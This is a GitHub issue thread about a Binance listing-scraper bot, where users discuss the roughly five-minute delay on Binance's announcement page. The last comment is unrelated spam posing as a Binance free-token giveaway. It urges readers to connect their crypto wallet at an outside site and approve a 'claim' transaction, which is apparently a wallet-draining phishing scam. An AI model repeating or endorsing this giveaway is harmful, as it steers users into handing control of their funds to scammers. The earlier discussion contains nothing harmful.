### ISSUE TITLE
Delay Binance

### ISSUE THREAD

**Issue by VuzzyM** [Lautaro-L/Binance_New_Coins_Scraper#4]
This problem is fixed on this bot? 

The problem is in the 5 minute delay

https://stackoverflow.com/questions/67736951/beautiful-soup-web-scraper-on-binance-announcement-page-lags-behind-by-5-minutes

https://www.cryptomaton.org/2021/10/31/binance-insider-trading-the-announcement-page-delay-and-gate-io-crypto-trading-bot/

**Comment by Lautaro-L** [comment]
I dont think it wil, by what i saw on the first link, in the responses to the question they use the same link i do, probably the solution is to use another endpoint, i saw that problem on another project. But this script doesnt take that in mind since im scheduling buy orders once is listed, not outside of binance like cryptomaton tho i prefer using the api rather than selenium to scrape sites

**Comment by VuzzyM** [comment]
> I dont think it wil, by what i saw on the first link, in the responses to the question they use the same link i do, probably the solution is to use another endpoint, i saw that problem on another project. But this script doesnt take that in mind since im scheduling buy orders once is listed, not outside of binance like cryptomaton tho i prefer using the api rather than selenium to scrape sites

So your chess coin was not listed with delay?

**Comment by Lautaro-L** [comment]
Im updating the page every 10 minutes since this bot doesnt need to see the coin as fast as possible because the announcement is done at least 20 minutes before its live, also i dont save the timestamps so i cant say for sure if it did or not but if i have to guess, the bot saw it 5 minutes late. To solve this we should explore all binance api endpoints but not the oficial ones

**Comment by VuzzyM** [comment]
> Im updating the page every 10 minutes since this bot doesnt need to see the coin as fast as possible because the announcement is done at least 20 minutes before its live, also i dont save the timestamps so i cant say for sure if it did or not but if i have to guess, the bot saw it 5 minutes late. To solve this we should explore all binance api endpoints but not the oficial ones

Can you find the solution please for the cryptoman project?

**Comment by Lautaro-L** [comment]
I'm currently busy with some things and cant right now but after a couple weeks i can try

**Comment by VuzzyM** [comment]
> I'm currently busy with some things and cant right now but after a couple weeks i can try

We'll wait, we really have no idea in this case, thanks

**Comment by VuzzyM** [comment]
@CyberPunkMetalHead

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
